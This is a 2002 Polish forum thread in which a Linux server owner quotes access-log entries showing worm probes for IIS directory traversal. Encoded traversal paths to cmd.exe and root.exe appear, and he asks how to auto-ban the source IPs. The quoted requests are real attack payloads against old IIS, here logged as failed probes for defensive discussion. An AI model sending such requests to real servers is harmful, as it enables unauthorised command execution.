Freesco, NND, CDN, EOS :: Wyświetl temat - Wirus'y rodem z WIN NT i ich zwalczanie

: [/] [] ()

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670 
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670 
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 

Autor:	C-O-N [ sobota, 9 listopada 2002, 19:28 ]
Tytuł:	Wirus'y rodem z WIN NT i ich zwalczanie
Jakims wspanialym sposobem wirusy napisane dla Windows NT zwiedzialy sie ze mam server w sieci i regularnie go inwigiluja. Nie sa to ip z sieci wewnetrznej, ale z roznych domen (np. nazwa.de nazwa.ch nazwa.com) . Takie mile wiruski probuja dostac sie do katalogu system , system32, scripts, etc. Prawie kazdy chce dorwac plik cmd.exe (odpowiednikiem w ms-dos jest chyba command.com) tyle ze to linux i nie ma ani katalogow, ani cmd.exe. W zasadzie to niewiele moga zwojowac, ale wydaje mi sie ze przez dobijanie sie co 10 sekund z roznych ip znacznie obnizaja wydajnosc mojego serwera i zasmiecaja mi logi systemu. Dlatego zaczalem dodawac ip z ktorych wirusy atakuja do banlist.cfg Niestety problem jest taki : (wreszcie plenta) ze po zablokowaniu jednego Ip po jakims czasie z innego wirus znow zaczyna atakowac. MOzna napisac skrypt ktory bedzie sam dodawal ip do banlist.cfg, jak odkryje np. ze z ip 80.80.34.15 ktos chcial wykonac katalog system albo pobrac plik cmd.exe Ktos juz sie z tym bawil? Jest cos podobnego opisane? Ktos napisal taki scrypt?

Autor:	Anonymous [ sobota, 9 listopada 2002, 21:49 ]
Tytuł:
: [/] [] () "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 GeSHi © Codebox Plus Olewaj wszystkie wpisu tego typu, niestety zasmiecaja logi rowno, a z ta wydajnoscia to tez bez przesady, najwyzej transfer spadnie ci do 9kB/s Skrypt tez mozna napisac (ale to on bedzie dodatkowo mulil serwer), a i przypadkiem mozesz zbanowac najlepszego kumpla z komuterem i >> NT Niestety logi zostaja najlepiej wylaczyc Apacha (czy co tam kto uzywa).

Freesco, NND, CDN, EOS http://forum.freesco.pl/

Wirus'y rodem z WIN NT i ich zwalczanie http://forum.freesco.pl/viewtopic.php?f=35&t=809	Strona 1 z 1

Strona 1 z 1	Strefa czasowa UTC+2godz.
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/